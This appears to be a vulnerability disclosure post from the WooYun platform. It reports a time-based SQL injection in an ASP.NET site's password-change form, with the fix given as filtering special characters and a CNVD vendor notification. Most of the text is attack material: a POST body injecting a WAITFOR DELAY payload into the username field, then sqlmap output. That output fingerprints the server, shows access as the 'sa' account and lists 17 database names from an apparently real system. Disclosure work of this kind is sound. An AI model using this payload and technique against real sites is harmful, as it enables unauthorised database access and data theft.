ys5LiA6Zi25q615YWI6L+b6ZuG5L2T5ZKM5YWI6L+b5Liq5Lq655qE5Yaz5a6a77yI6LWj5Lqk5Lmd5r
Gf5aSn5qGl5Yqe5a2X44CQMjAxMeOAkTMx5Y+377yJZGQCBQ9kFgZmDxUCEuS4lueVjOWNgeWkp+ahpe
aigRlUMjAwOTAzMjQyMzA3MDQzNDEwMDAwMTk0ZAIBDw8WAh8EaGRkAgIPDxYEHwEFEuS4lueVjOWNge
Wkp+ahpeaigR8CBRLkuJbnlYzljYHlpKfmoaXmooFkZAIGD2QWBmYPFQK5Aeemj+W3nuiHs+mTtuW3ne
mrmOmAn+WFrOi3r+S5neaxn+mVv+axn+WFrOi3r+Wkp+ahpSjmsZ/opb/mrrUp5aSn5Z6L5pSv5bqn44
CB5oi/5bu65Y+K5YW26ZmE5bGe5bel56iL5pa95bel55uR55CG44CB5oi/5bu65Y+K5YW26ZmE5bGe5b
el56iL5pa95bel44CB57u/5YyW5bel56iL5pa95bel5oub5qCH57uT5p6c5YWs56S6GVQyMDExMDMxMD
A4NDM0NjA5MTAwMDAxOTRkAgEPDxYCHwRoZGQCAg8PFgQfAQUn56aP5bee6Iez6ZO25bed6auY6YCf5Y
Ws6Lev5Lmd5rGf6ZW/Li4uHwIFuQHnpo/lt57oh7Ppk7blt53pq5jpgJ/lhazot6/kuZ3msZ/plb/msZ
/lhazot6/lpKfmoaUo5rGf6KW/5q61KeWkp+Wei+aUr+W6p+OAgeaIv+W7uuWPiuWFtumZhOWxnuW3pe
eoi+aWveW3peebkeeQhuOAgeaIv+W7uuWPiuWFtumZhOWxnuW3peeoi+aWveW3peOAgee7v+WMluW3pe
eoi+aWveW3peaLm+agh+e7k+aenOWFrOekumRkAgcPZBYGZg8VAiTkuZ3msZ/plb/msZ/lhazot6/lpK
fmoaXpobnnm67mlofljJYZVDIwMDkwODA1MTY0NjUzNDgxMDAwMDE5NGQCAQ8PFgIfBGhkZAICDw8WBB
8BBSTkuZ3msZ/plb/msZ/lhazot6/lpKfmoaXpobnnm67mlofljJYfAgUk5Lmd5rGf6ZW/5rGf5YWs6L
ev5aSn5qGl6aG555uu5paH5YyWZGRkInztdye2D/7fEQxfA5JDVonN3Rk=&__EVENTVALIDATION=/wE
WBgL7nfzqCALpi4HhAQKVuNeDDQLnpPDZAwLn4ZS4BwLQxrzYB5BL2NzThhveVR8MpohjjNYFGSsq&tx
tKeyWord=??????&ctl00$holderContent$txtUserName=a') WAITFOR DELAY '0:0:5'--&ctl0
0$holderContent$txtPassword=a&ctl00$holderContent$txtNewPassword=s&ctl00$holderC
ontent$txtConfirmPassword=s
---
[15:56:53] [INFO] testing MySQL
[15:56:59] [WARNING] the back-end DBMS is not MySQL
[16:01:32] [INFO] testing Oracle
[16:01:37] [WARNING] the back-end DBMS is not Oracle
[16:01:37] [INFO] testing PostgreSQL
[16:01:42] [WARNING] the back-end DBMS is not PostgreSQL
[16:01:42] [INFO] testing Microsoft SQL Server
[16:01:47] [INFO] confirming Microsoft SQL Server
[16:02:03] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[16:02:03] [INFO] fetching current user
current user: 'sa'
[16:02:09] [INFO] fetching current database
current database: 'website_jj'
[16:02:14] [INFO] fetching database names
[16:02:20] [INFO] the SQL query used returns 17 entries
[16:02:25] [INFO] retrieved: "EMS0425"
[16:02:30] [INFO] retrieved: "EMSTEST"
[16:02:36] [INFO] retrieved: "hcs50_sw"
[16:02:41] [INFO] retrieved: "hcs50_sw_new"
[16:02:46] [INFO] retrieved: "hcs50_sw20120525"
[16:02:52] [INFO] retrieved: "master"
[16:02:57] [INFO] retrieved: "model"
[16:03:03] [INFO] retrieved: "msdb"
[16:03:08] [INFO] retrieved: "NXPKPMBS"
[16:03:13] [INFO] retrieved: "ReportServerWeb"
[16:03:19] [INFO] retrieved: "ReportServerWebTempDB"
[16:03:24] [INFO] retrieved: "RHBookManage"
[16:03:29] [INFO] retrieved: "tempdb"
[16:03:34] [INFO] retrieved: "TPEHS"
[16:03:40] [INFO] retrieved: "TPUPDOWN"
[16:03:45] [INFO] retrieved: "WebSite_bk"
[16:03:50] [INFO] retrieved: "website_jj"
available databases [17]:
[*] EMS0425
[*] EMSTEST
[*] hcs50_sw
[*] hcs50_sw20120525
[*] hcs50_sw_new
[*] master
[*] model
[*] msdb
[*] NXPKPMBS
[*] ReportServerWeb
[*] ReportServerWebTempDB
[*] RHBookManage
[*] tempdb
[*] TPEHS
[*] TPUPDOWN
[*] WebSite_bk
[*] website_jj

漏洞证明:

已证明

修复方案:

过滤特殊字符

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-13 11:31

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商通报。

最新状态:

暂无


漏洞评价:

评论